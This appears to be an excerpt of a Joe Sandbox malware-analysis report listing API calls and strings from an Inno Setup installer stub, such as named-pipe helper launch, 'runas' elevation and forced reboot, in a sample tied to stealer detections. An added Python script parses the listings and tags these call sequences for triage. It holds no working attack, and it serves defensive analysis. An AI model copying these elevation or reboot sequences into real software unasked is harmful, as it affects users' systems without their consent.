• GetCurrentProcessId.KERNEL32(?,020A3858,00000000,004588C2,?,?,020A3858,00000000,?,00458FBE,?,020A3858,00000000), ref: 0045864B
• CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
• GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,020A3858,020A3858), ref: 004586CF
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
• SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
• CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
• CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
• CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                                                                                                                                                  • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                                                                                                                                                  • API String ID: 770386003-3271284199
                                                                                                                                                                                                                                  • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                                                                                                                                                  • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
  • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
  • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
  • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4), ref: 004783CC
  • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
  • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,020A2BF4,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
• ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
• GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
• GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
• CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
• String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
• API String ID: 883996979-221126205
• Opcode ID: d94476177e89f61339d65e5f577ff2872d1a8d23f03fec93f8535f7d0bd6bb56
• Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
• Opcode Fuzzy Hash: d94476177e89f61339d65e5f577ff2872d1a8d23f03fec93f8535f7d0bd6bb56
• Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
• ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: MessageSendShowWindow
• String ID:
• API String ID: 1631623395-0
• Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
• Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
• Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
• Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 00418393
• GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
• GetWindowRect.USER32(?), ref: 004183CC
• GetWindowLongA.USER32(?,000000F0), ref: 004183DA
• GetWindowLongA.USER32(?,000000F8), ref: 004183EF
• ScreenToClient.USER32(00000000), ref: 004183F8
• ScreenToClient.USER32(00000000,?), ref: 00418403
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$ClientLongScreen$IconicPlacementRect
• String ID: ,
• API String ID: 2266315723-3772416878
• Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
• Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
• Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
• Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
Uniqueness
Uniqueness Score: -1.00%

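The entries on this page are Joe Sandbox's per-function API listings for the image mapped at 0x00400000 in process 0000000E. The strings they reference (the \\.\pipe\InnoSetup64BitHelper-... pipe name, "64-bit helper EXE wasn't extracted", the "runas" verb used with ShellExecuteEx, and the SeShutdownPrivilege/ExitWindowsEx restart routine in the entry that follows) mark them as routines of the Inno Setup installer stub, so they describe the installer wrapper rather than the stealer payloads named in the detection summary. Two caveats when reading the argument columns: the report prints stack values beyond an API's documented parameter count (the 00000028 shown for GetCurrentProcess, which takes no arguments, is the TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY access mask of the following OpenProcessToken), and "Part of subcall function" lines are calls made inside a callee, not calls the listed function makes directly. The script below is an added example, not part of this report or of Joe Sandbox's tooling: it parses listings in this format and tags the call sequences that matter for triage. SAMPLE is constructed from lines on this page; the line-format regexes, the EWX flag table and the tagging rules are this example's own assumptions.

```python
"""Parse Joe Sandbox per-function 'APIs' listings and tag call sequences.
Added example, not part of the report or of Joe Sandbox tooling. SAMPLE is
constructed from entries on this page; regexes and rules are assumptions."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# "• Name.MODULE(arg,...), ref: 0047858C", optionally prefixed by
# "Part of subcall function 00478370: " for calls made inside a callee.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")
# ExitWindowsEx uFlags bits (winuser.h); 0 with none set is EWX_LOGOFF.
EWX_FLAGS = {0x1: "SHUTDOWN", 0x2: "REBOOT", 0x4: "FORCE", 0x8: "POWEROFF", 0x10: "FORCEIFHUNG"}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]         # stack slots as printed; slots past the real arity are not parameters
    ref: str                # address of the call site
    subcall: Optional[str]  # callee address when the call happens inside a subcall


@dataclass
class Entry:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

    def first(self, api: str) -> Optional[Call]:
        return next((c for c in self.calls if c.api == api), None)


def parse_listing(text: str) -> List[Entry]:
    """Each 'APIs' header opens a new function entry; other report lines are ignored."""
    entries: List[Entry] = []
    cur: Optional[Entry] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Entry()
            entries.append(cur)
        elif cur is not None:
            m = API_LINE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"].strip() else []
                cur.calls.append(Call(m["api"], m["mod"], args, m["ref"].upper(), m["sub"]))
            elif (m := STRING_LINE.match(line)):
                cur.strings = [s for s in m["ids"].split("$") if s]
    return entries


def decode_ewx(arg: str) -> List[str]:
    """Expand the ExitWindowsEx uFlags value (hex as printed) into flag names."""
    flags = int(arg, 16)
    return [name for bit, name in EWX_FLAGS.items() if flags & bit] or ["LOGOFF"]


def classify(entry: Entry) -> List[str]:
    """Behaviour tags implied by one function's call sequence and its string refs."""
    tags = []
    priv, exitw = entry.first("LookupPrivilegeValueA"), entry.first("ExitWindowsEx")
    if priv and "SeShutdownPrivilege" in priv.args and entry.first("AdjustTokenPrivileges") and exitw:
        tags.append("reboot:" + "|".join(decode_ewx(exitw.args[0])))
    if entry.first("ShellExecuteEx") and "runas" in entry.strings:
        tags.append("uac-elevation-runas")  # the 'runas' verb asks the shell for an elevated process
    if entry.first("GetModuleHandleA") and entry.first("GetProcAddress"):
        tags.append("dynamic-import")       # resolves an export at run time (here inside a subcall)
    return tags


# Constructed from the listings on this page (hypothetical subset, not the full report).
SAMPLE = """APIs
  • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
  • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
• ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
• GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
• String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
APIs
• IsIconic.USER32(?), ref: 00418393
• GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
• String ID: ,
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
• ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
"""

if __name__ == "__main__":
    for e in parse_listing(SAMPLE):
        print(e.calls[0].ref, [c.api for c in e.calls], classify(e) or ["no rule matched"])
```

Run as-is to get one line per function entry; the runas entry tags as UAC elevation plus a dynamic import, the window-placement entry matches no rule, and the restart routine decodes ExitWindowsEx(00000002) as EWX_REBOOT. Feed it the whole report text to tag every entry, and add rules for the sequences you care about (the CreateNamedPipe/CreateProcess helper launch in the first entry is a natural next one).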
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
• ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                  • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                  • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                                                                                                                                                  • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
• GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
• GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
• ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc$CryptVersion
• String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
• API String ID: 1951258720-508647305
• Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
• Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
• Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
• Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
• SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
• FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
• FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstNext
• String ID: isRS-$isRS-???.tmp
• API String ID: 134685335-3422211394
• Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
• Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
• Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
• Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
Uniqueness

Uniqueness Score: -1.00%

APIs
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
• SetForegroundWindow.USER32(?), ref: 00457649
• NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
Strings
• Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: MessagePostWindow$ForegroundNtdllProc_
• String ID: Cannot evaluate variable because [Code] isn't running yet
• API String ID: 2236967946-3182603685
• Opcode ID: 2ca755f27c06970d2981b9b6af8c1c8ef9ed629d0542f582d4c6a8f6149c0e68
• Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
• Opcode Fuzzy Hash: 2ca755f27c06970d2981b9b6af8c1c8ef9ed629d0542f582d4c6a8f6149c0e68
• Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
• Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
• Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
• Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 00417D0F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$Placement$Iconic
• String ID: ,
• API String ID: 568898626-3772416878
• Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
• Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
• Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
• Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
• FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
• FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
• FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
• Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
• Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
• Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
• FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
• FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
• FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
• Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
• Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
• Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
• DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
• GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
